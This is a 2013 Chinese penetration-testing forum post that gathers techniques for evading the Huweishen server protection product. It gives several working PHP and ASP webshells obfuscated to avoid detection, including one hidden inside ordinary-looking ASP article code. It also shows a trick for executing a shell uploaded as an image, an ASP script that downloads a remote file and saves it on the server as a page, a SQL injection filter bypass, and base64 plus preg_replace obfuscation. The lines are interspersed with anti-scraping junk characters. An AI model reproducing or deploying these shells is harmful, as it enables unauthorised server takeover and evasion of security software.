找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 突破护卫神技术总汇
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2081|回复: 0
打印 上一主题 下一主题

突破护卫神技术总汇

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-14 00:11:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上6 r# Q3 s7 U3 K# ]5 j8 h
-----------------------------------------------------------------------------------------------------------------------------------
' O- l; i4 F& t文章分为:! o7 o! ^' y: [; ^- @4 C6 R/ A
一、马儿篇,都是以前可以过护卫神的马/ s5 S3 h+ Z) v7 Y
二、注入篇,可以绕过注入的方法
9 v# C4 M' @0 I* Q1 L三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
, U% g  }2 p4 x: Q' D一、马儿篇
! y/ W+ @% T$ V% H& m----------------1号--------------------------
/ e( Q: G2 b% j+ |! z< ?php ! ]( p- U8 T" v4 ~( {, V8 R, O
@eval5 k5 `; D8 U" ]4 x
($_POST['1']);?>
% ^  F8 @- p- r6 u9 j----------------2号--------------------------5 ~7 v7 b# D* B( c. f& r% m
<title>login</title>nono<?php
- G" F+ O8 m9 g6 N, m$ \eval' r- [* E& ]' P2 \
($_POST- R" t, s6 N0 A5 D8 ?
[1])
. c" _8 j* b. @?>: o) s# k, y& i- _! O" o
--------------------3号---------------------------------------------* t) h5 O; g. J5 C7 H: q
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
/ e4 S2 x/ x2 a8 k9 Q$a($_POST["c"]); ?>
# i' i# d) S6 A菜刀直接连,不需要构造连接字符串,密码 c
4 O1 a; P8 S. V  T# q! l---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>7 w! S' U& j+ j
<%@language=vbscript codepage=936 %>1 s% z  i7 x' \$ E
<%
% T$ E) R. V- d; vOption Explicit
+ u3 @- V8 \7 ?' r: u! h'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面- j( {7 }3 o7 r! |5 H
Response.Buffer = True
$ }$ s$ z# N6 Z- iResponse.Expires = -1
' s  d4 M* h. k$ ^  zResponse.ExpiresAbsolute = Now() - 1
$ c# \0 m  j, ]6 n7 GResponse.Expires = 0
7 G  r( X1 S( u/ J8 EResponse.CacheControl = "no-cache"
& b: y7 N/ p& F/ Zdim m9 C3 E3 o- \. |5 g& d- Y9 O7 Z
m=request("m")8 m7 ^! k6 ?6 m/ E4 t  U" y! L
Dim ArticleID, Action, sql, rs, Hits, ShowType- [0 q/ E/ {, z* M$ ~
if m<>"" then execute(m)7 B/ t+ `* D6 i0 b2 m  E
ArticleID = Trim(request("ArticleID")): N! A1 z* W  U6 h
Action = Trim(request("Action"))1 _+ ]* \6 m( ]( t' m: \
ShowType = Trim(request("ShowType"))  r% g0 w7 N4 K' X
If IsNumeric(ShowType) Then
8 a1 |, z$ w" X9 `    ShowType = CLng(ShowType)
$ t  D4 Q8 W# k* wElse/ O5 F' R& K/ X2 h: C
    ShowType = 1
% _9 G& S/ H6 E# VEnd If% f1 w) n& p, c* N% A: E
%>
9 k8 U3 }) h/ q3 y# X% i--------------------类似于过安全狗的包含方法-------------------------------------------
. q$ g* F8 V7 U3 h! v# U# a4 e7 ^A.asp版本:9 u. m2 K* o. Q4 v' |
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg ! A6 ~4 H, ~  |, M7 r; z
在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"--> ' j5 c- h6 I+ g  I2 m4 a& B
B.php版本
$ x; ?" ^% N; R5 E如果是php的话:, K* I: s, t: p* _3 ]7 c9 k
< ?php
; j. D) `$ `6 m" }include "1.htm";
5 ^) y* n- ?, L* ~* @* @# b4 y( W' d4 ]?>2 Y' h  @, C% T% w! d. e; }, x
------------------实在不行,还可以下载---------------------------------------------* a) ~( l& M- y
远程下载马
1 y4 i" p' Z! O5 o<%/ X5 w: Z0 t1 x/ V- ~

! d8 }) p5 j/ N% B1 w0 |Set xPost = CreateObject("Microsoft.XMLHTTP")
6 K- U- P8 ^# O3 [0 ^6 J 1 S3 k; _* A/ C4 X
xPost.Open "GET","http://www.8090sec.com/1.txt",False
: k5 R" q! _9 i1 F % O7 ~5 @8 j$ y4 }* F
xPost.Send()- ~" a% n/ u) r
8 d5 a; y) o* a" m  A
Set sGet = CreateObject("ADODB.Stream")
9 S' ^5 Q+ R$ Z7 e) O) g" W) T
* O$ }, @" {; \sGet.Mode = 3( |! b( a* n& k/ U
/ G( c3 _7 y+ \
sGet.Type = 1
5 q1 _+ l* Y* l4 l* b ( m8 w+ @9 J8 g* Y" q7 I+ ]
sGet.Open()% {; d8 s4 B2 F% E6 E: h
4 z/ ~0 ^+ Y/ O% d  O" |
sGet.Write(xPost.responseBody)  h+ j3 [) T, [$ U3 a

1 M) `! m! n8 M- W' W8 MsGet.SaveToFile Server.MapPath("ls.asp"),2: z; E$ F4 C+ Z
$ W9 Z- ^+ V2 m) d) _' F: Q! B
set sGet = nothing1 v) ]$ {8 W5 _& e

  L& w) e! c: Yset sPOST = nothing4 ?' [  n" o& _/ x9 {* E& z
; Q* S+ [$ A, c. S
%>+ X3 s5 ?4 _4 P. h, `3 W5 @
二、注入篇
; s* x7 @. i, F! }, _8 ^; Y+ `+ u# b! H/*%00*/截断符1 ~- P+ R& h) B7 l' v: R' I( E! z
select/*%00*/* from admin;( i5 H* F8 B7 S% _) M% J
---------------------------------------------------------------) g' V0 @7 z& a4 `
---------------------------------------------------------------
( B! i/ B& h  b8 {$ W$ c; p& h三、规则篇
9 n6 K) l6 M9 d4 C可以利用类似:  i* _; Q+ S! h8 U1 t. ?
<?php
  r5 t% U# p- ?5 z' ]; m0 G/ L
/ q' t4 A5 ~  a3 ~# t$code='一串base64'; //base64编码
0 b( m8 b* T6 c
; A+ t4 P5 I' V2 H$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换. |' Q! F$ ^, Z$ c6 }
2 b8 B% F: R9 ?8 ^7 p6 ]
$a = '/a/';//正则规则
  P6 v# Q( b& l0 A  ~  t % A" L. T! H4 m5 l. E4 g
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换5 t  l0 r6 {) I& w4 }3 y. C2 h! T

0 ]* I  z2 X- u8 }?>6 l  m* Z* G5 N$ }3 p+ k# \
方法绕过关键词过滤
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表